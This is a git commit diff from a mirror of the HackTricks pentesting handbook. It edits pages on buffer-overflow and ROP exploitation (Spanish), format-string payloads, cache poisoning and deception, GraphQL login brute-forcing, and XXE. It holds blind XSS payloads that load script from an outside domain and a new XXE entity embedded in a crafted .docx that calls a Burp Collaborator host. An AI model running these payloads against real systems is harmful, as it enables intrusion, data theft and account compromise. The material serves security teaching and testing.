mirror of
https://github.com/carlospolop/hacktricks
synced 2025-02-16 14:08:26 +00:00
GitBook: [master] 10 pages and 4 assets modified
This commit is contained in:
CPol
gitbook-bot
parent
b38608ac6c
commit
53db995b86
13 changed files with 99 additions and 59 deletions
Binary file not shown.
|
After Width: | Height: | Size: 1.5 KiB |
|
Before Width: | Height: | Size: 33 KiB After Width: | Height: | Size: 33 KiB |
BIN
.gitbook/assets/image (621) (1) (1).png
Normal file
BIN
.gitbook/assets/image (621) (1) (1).png
Normal file
Binary file not shown.
|
After Width: | Height: | Size: 24 KiB |
|
|
@ -59,8 +59,6 @@ Para obtener la dirección de una función dentro de un programa se puede hacer:
|
|||
objdump -d ./PROGRAMA | grep FUNCION
|
||||
```
|
||||
|
||||
|
||||
|
||||
## ROP
|
||||
|
||||
### Call to sys\_execve
|
||||
|
|
@ -124,7 +122,6 @@ call -0x24 ; Salto a la primera instru
|
|||
|
||||
**EJ usando el Stack\(/bin/sh\):**
|
||||
|
||||
|
||||
```text
|
||||
section .text
|
||||
global _start
|
||||
|
|
@ -250,8 +247,9 @@ De esta forma se pueden encadenar funciones a las que llamar. Además, si se qui
|
|||
Consiste en aprovechar el poder manipular el EBP para ir encadenando la ejecución de varias funciones a través del EBP y de "leave;ret"
|
||||
|
||||
RELLENO
|
||||
+ Situamos en el EBP un EBP falso que apunta a: 2º EBP\_falso + la función a ejecutar: \(&system\(\) + &leave;ret + &“/bin/sh”\)
|
||||
+ En el EIP ponemos de dirección una función &\(leave;ret\)
|
||||
|
||||
* Situamos en el EBP un EBP falso que apunta a: 2º EBP\_falso + la función a ejecutar: \(&system\(\) + &leave;ret + &“/bin/sh”\)
|
||||
* En el EIP ponemos de dirección una función &\(leave;ret\)
|
||||
|
||||
Iniciamos la shellcode con la dirección a la siguiente parte de la shellcode, por ej: 2ºEBP\_falso + &system\(\) + &\(leave;ret;\) + &”/bin/sh”
|
||||
|
||||
|
|
@ -273,7 +271,9 @@ El exploit quedaría: SHELLCODE + Relleno \(hasta EIP\) + **&ret** \(los siguien
|
|||
|
||||
Al parecer funciones como **strncpy** una vez completas eliminan de la pila la dirección donde estaba guardada la shellcode imposibilitando esta técnica. Es decir, la dirección que pasan a la función como argumento \(la que guarda la shellcode\) es modificada por un 0x00 por lo que al llamar al segundo **ret** se encuentra con un 0x00 y el programa muere.
|
||||
|
||||
```text
|
||||
**Ret2PopRet**
|
||||
```
|
||||
|
||||
Si no tenemos control sobre el primer argumento pero sí sobre el segundo o el tercero, podemos sobreescribir EIP con una dirección a pop-ret o pop-pop-ret, según la que necesitemos.
|
||||
|
||||
|
|
@ -653,7 +653,7 @@ So what's the **bypass**? The typical bypass I use is to just don't write to mem
|
|||
Note that in order for this to happen the binary needs to know previous to execution the addresses to the functions:
|
||||
|
||||
* Lazy binding: The address of a function is searched the first time the function is called. So, the GOT needs to have write permissions during execution.
|
||||
* Bind now: The addresses of the functions are solved at the begginig of the execution, then read-only permissions are given to sensitive sections like .got, .dtors, .ctors, .dynamic, .jcr. ``**`-z relro`** `y` **`-z now`**
|
||||
* Bind now: The addresses of the functions are solved at the begginig of the execution, then read-only permissions are given to sensitive sections like .got, .dtors, .ctors, .dynamic, .jcr. ```**``-z relro`**`y`**`-z now\`\*\*
|
||||
|
||||
To check if a program uses Bind now you can do:
|
||||
|
||||
|
|
@ -663,8 +663,6 @@ readelf -l /proc/ID_PROC/exe | grep BIND_NOW
|
|||
|
||||
\*\*\*\*
|
||||
|
||||
|
||||
|
||||
Cuando el binario es cargado en memoria y una función es llamada por primera vez se salta a la PLT \(Procedure Linkage Table\), de aquí se realiza un salto \(jmp\) a la GOT y descubre que esa entrada no ha sido resuelta \(contiene una dirección siguiente de la PLT\). Por lo que invoca al Runtime Linker o rtfd para que resuelva la dirección y la guarde en la GOT.
|
||||
|
||||
Cuando se llama a una función se llama a la PLT, esta tiene la dirección de la GOT donde se almacena la dirección de la función, por lo que redirige el flujo allí y así se llama a la función. Sin embargo, si es la primera vez que se llama a la función, lo que hay en la GOT es la siguiente instrucción de la PLT, por lo tanto el flujo sigue el código de la PLT \(rtfd\) y averigua la dirección de la función, la guarda en la GOT y la llama.
|
||||
|
|
|
|||
|
|
@ -60,7 +60,7 @@ def connect_binary():
|
|||
def send_payload(payload):
|
||||
payload = PREFIX_PAYLOAD + payload + SUFFIX_PAYLOAD
|
||||
log.info("payload = %s" % repr(payload))
|
||||
if len(payload) > MAX_LENTGH: print("!!!!!!!!! ERROR, MAX LENGTH EXCEEDED. To mae it shorter consider changing the <num>c% for <num/4>x%")
|
||||
if len(payload) > MAX_LENTGH: print("!!!!!!!!! ERROR, MAX LENGTH EXCEEDED")
|
||||
P.sendline(payload)
|
||||
sleep(0.5)
|
||||
return P.recv()
|
||||
|
|
|
|||
|
|
@ -154,7 +154,7 @@ If you want to **know** about my **latest modifications**/**additions** or you h
|
|||
If you want to **share some tricks with the community** you can also submit **pull requests** to ****[**https://github.com/carlospolop/hacktricks**](https://github.com/carlospolop/hacktricks) ****that will be reflected in this book.
|
||||
Don't forget to **give ⭐ on the github** to motivate me to continue developing this book.
|
||||
|
||||
|
||||
|
||||
|
||||
[**Buy me a coffee here**](https://www.buymeacoffee.com/carlospolop)\*\*\*\*
|
||||
|
||||
|
|
|
|||
|
|
@ -18,7 +18,7 @@ If you want to **share some tricks with the community** you can also submit **pu
|
|||
|
||||
## 0- Physical Attacks
|
||||
|
||||
Do you have **physical access** to the machine that you want to attack? You should read some [**tricks about physical attacks**](physical-attacks/physical-attacks.md) and others about ****[**escaping from GUI applications**](physical-attacks/escaping-from-gui-applications/).
|
||||
Do you have **physical access** to the machine that you want to attack? You should read some [**tricks about physical attacks**](physical-attacks/physical-attacks.md) and others about **\*\*\[**escaping from GUI applications\*\*\]\(physical-attacks/escaping-from-gui-applications/\).
|
||||
|
||||
## 1 - [Discovering hosts inside the network ](pentesting/pentesting-network/#discovering-hosts)/ [Discovering Assets of the company](external-recon-methodology/)
|
||||
|
||||
|
|
|
|||
|
|
@ -9,7 +9,7 @@
|
|||
|
||||
## Cache Poisoning
|
||||
|
||||
The goal of poisoning the cache is to make the clients load unexpected resources partially or totally controlled by the attacker.
|
||||
The goal of poisoning the cache is to make the **clients load unexpected resources partially or totally controlled by the attacker**.
|
||||
The poisoned response will only be served to users who visit the affected page while the cache is poisoned. As a result, the impact can range from non-existent to massive depending on whether the page is popular or not.
|
||||
|
||||
In order to perform a cache poisoning attack you need first to **identify ukeyed inputs** \(parameters not needed to appear on the the cached request but that change the returned page\), see **how to abuse** this parameter and **get the response cached**.
|
||||
|
|
@ -91,9 +91,11 @@ Learn here about how to perform [Cache Poisoning attacks abusing HTTP Request Sm
|
|||
|
||||
## Cache Deception
|
||||
|
||||
The goal of Cache Deception is to make clients load resources that are going to be saved by the cache with their sensitive information.
|
||||
A very clear example can be found in this write-up: [https://hackerone.com/reports/593712](https://hackerone.com/reports/593712).
|
||||
The goal of Cache Deception is to make clients **load resources that are going to be saved by the cache with their sensitive information**.
|
||||
|
||||
First of all note that **extensions** such as `.css`, `.js`, `.png` etc are usually **configured** to be **saved** in the **cache.** Therefore, if you access w_ww.example.com/profile.php/nonexistent.js_ the cache will probably store the response because it sees the `.js` **extension**. But, if the **application** is **replaying** with the **sensitive** user contents stored in _www.example.com/profile.php_, you can **steal** those contents from other users.
|
||||
|
||||
Another very clear example can be found in this write-up: [https://hackerone.com/reports/593712](https://hackerone.com/reports/593712).
|
||||
In the example it is explained that if you load a non-existent page like _http://www.example.com/home.php/non-existent.css_ the content of _http://www.example.com/home.php_ \(**with the users sensitive information**\) is going to be returned and the cache server is going to save the result.
|
||||
Then, the **attacker** can access _http://www.example.com/home.php_ and see the **confidential information** of the users that accessed before.
|
||||
|
||||
|
|
|
|||
|
|
@ -837,6 +837,8 @@ There is **C2** dedicated to the **exploitation of Service Workers** called [**S
|
|||
|
||||
### Blind XSS payloads
|
||||
|
||||
You can also use: [https://xsshunter.com/](https://xsshunter.com/)
|
||||
|
||||
```markup
|
||||
"><img src='//domain/xss'>
|
||||
"><script src="//domain/xss.js"></script>
|
||||
|
|
|
|||
|
|
@ -295,6 +295,47 @@ Testing 0 entities : []
|
|||
Testing 0 entities : []
|
||||
```
|
||||
|
||||
### XXE via Office Open XML Parsers
|
||||
|
||||
\(Copied from [**here**](https://labs.detectify.com/2021/09/30/10-types-web-vulnerabilities-often-missed/)\)
|
||||
Many web applications allow you to upload Microsoft Office documents, and then they parse some details out of them. For example, you might have a web application that allows you to import data by uploading a spreadsheet in XLSX format. At some point, in order for the parser to extract the data from the Spreadsheet, the parser is going to need to **parse at least one XML file**.
|
||||
|
||||
The only way to test for this is to generate a **Microsoft Office file that contains an XXE payload**, so let’s do that. First, create an empty directory to unzip your document to, and unzip it!
|
||||
|
||||
```text
|
||||
test$ ls
|
||||
test.docx
|
||||
test$ mkdir unzipped
|
||||
test$ unzip ./test.docx -d ./unzipped/
|
||||
Archive: ./test.docx
|
||||
inflating: ./unzipped/word/numbering.xml
|
||||
inflating: ./unzipped/word/settings.xml
|
||||
inflating: ./unzipped/word/fontTable.xml
|
||||
inflating: ./unzipped/word/styles.xml
|
||||
inflating: ./unzipped/word/document.xml
|
||||
inflating: ./unzipped/word/_rels/document.xml.rels
|
||||
inflating: ./unzipped/_rels/.rels
|
||||
inflating: ./unzipped/word/theme/theme1.xml
|
||||
inflating: ./unzipped/[Content_Types].xml
|
||||
```
|
||||
|
||||
Open up `./unzipped/word/document.xml` in your favourite text editor \(vim\) and edit the **XML to contain your favourite XXE payload**. The first thing I try tends to be a HTTP request, like this:
|
||||
|
||||
```text
|
||||
<!DOCTYPE x [ <!ENTITY test SYSTEM "http://[ID].burpcollaborator.net/"> ]>
|
||||
<x>&test;</x>
|
||||
```
|
||||
|
||||
Those lines should be inserted in between the two root XML objects, like this, and of course you will need to replace the URL with a URL that you can monitor for requests:
|
||||
|
||||
|
||||
|
||||
All that is left is to **zip the file up to create your evil poc.docx file**. From the “unzipped” directory that we created earlier, run the following:
|
||||
|
||||
|
||||
|
||||
Now upload the file to your \(hopefully\) vulnerable web application and pray to the hacking gods for a request in your Burp Collaborator logs.
|
||||
|
||||
### Jar: protocol
|
||||
|
||||
The `jar` protocol is only available on **Java applications**. It allows to access files inside a **PKZIP** file \(`.zip`, `.jar`, ...\) and works for local and remote files:
|
||||
|
|
|
|||
|
|
@ -16,7 +16,7 @@ When performing your directory brute force attacks make sure to add the followin
|
|||
* _/graphql/console_
|
||||
|
||||
Once you find an open graphQL instance you need to know what queries it supports. This can be done by using the introspection system, more details can be found here: [**GraphQL: A query language for APIs.**
|
||||
_It’s often useful to ask a GraphQL schema for information about what queries it supports. GraphQL allows us to do so…_graphql.org](https://graphql.org/learn/introspection/)
|
||||
\_It’s often useful to ask a GraphQL schema for information about what queries it supports. GraphQL allows us to do so…\_graphql.org](https://graphql.org/learn/introspection/)
|
||||
|
||||
### Basic Enumeration
|
||||
|
||||
|
|
@ -242,7 +242,6 @@ mutation {
|
|||
}
|
||||
}
|
||||
}
|
||||
|
||||
```
|
||||
|
||||
### Batching brute-force in 1 API request
|
||||
|
|
@ -254,8 +253,6 @@ Below you can find the simplest demonstration of an application authentication r
|
|||
|
||||
|
||||
|
||||
|
||||
|
||||
As we can see from the response screenshot, the first and the third requests returned _null_ and reflected the corresponding information in the _error_ section. The **second mutation had the correct authentication** data and the response has the correct authentication session token.
|
||||
|
||||
|
||||
|
|
@ -294,23 +291,23 @@ For more information **check the** [**original post here**](https://blog.doyense
|
|||
|
||||
### Clients
|
||||
|
||||
{% embed url="https://github.com/graphql/graphiql" %}
|
||||
{% embed url="https://github.com/graphql/graphiql" caption="" %}
|
||||
|
||||
{% embed url="https://github.com/swisskyrepo/GraphQLmap" %}
|
||||
{% embed url="https://github.com/swisskyrepo/GraphQLmap" caption="" %}
|
||||
|
||||
{% embed url="https://altair.sirmuel.design/" %}
|
||||
{% embed url="https://altair.sirmuel.design/" caption="" %}
|
||||
|
||||
{% embed url="https://blog.doyensec.com/2020/03/26/graphql-scanner.html" %}
|
||||
{% embed url="https://blog.doyensec.com/2020/03/26/graphql-scanner.html" caption="" %}
|
||||
|
||||
{% embed url="https://github.com/doyensec/inql" %}
|
||||
{% embed url="https://github.com/doyensec/inql" caption="" %}
|
||||
|
||||
{% embed url="https://altair.sirmuel.design/" %}
|
||||
{% embed url="https://altair.sirmuel.design/" caption="" %}
|
||||
|
||||
{% embed url="https://gitlab.com/dee-see/graphql-path-enum" %}
|
||||
{% embed url="https://gitlab.com/dee-see/graphql-path-enum" caption="" %}
|
||||
|
||||
### Automatic Tests
|
||||
|
||||
{% embed url="https://graphql-dashboard.herokuapp.com/" %}
|
||||
{% embed url="https://graphql-dashboard.herokuapp.com/" caption="" %}
|
||||
|
||||
* Video explaining AutoGraphQL: [https://www.youtube.com/watch?v=JJmufWfVvyU](https://www.youtube.com/watch?v=JJmufWfVvyU)
|
||||
|
||||
|
|
|
|||
|
|
@ -402,7 +402,7 @@ If you don't execute this from a Domain Controller, ATA is going to catch you, s
|
|||
* [Python script to enumerate active directory](https://github.com/ropnop/windapsearch)
|
||||
* [Python script to enumerate active directory](https://github.com/CroweCybersecurity/ad-ldap-enum)
|
||||
|
||||
|
||||
|
||||
|
||||
[**Buy me a coffee here**](https://www.buymeacoffee.com/carlospolop)
|
||||
|
||||
|
|
|
|||
|
|
@ -126,7 +126,7 @@ If you want to **know** about my **latest modifications**/**additions** or you h
|
|||
If you want to **share some tricks with the community** you can also submit **pull requests** to ****[**https://github.com/carlospolop/hacktricks**](https://github.com/carlospolop/hacktricks) ****that will be reflected in this book.
|
||||
Don't forget to **give ⭐ on the github** to motivate me to continue developing this book.
|
||||
|
||||
|
||||
|
||||
|
||||
[**Buy me a coffee here**](https://www.buymeacoffee.com/carlospolop)\*\*\*\*
|
||||
|
||||
|
|
|
|||
Loading…
Add table
Reference in a new issue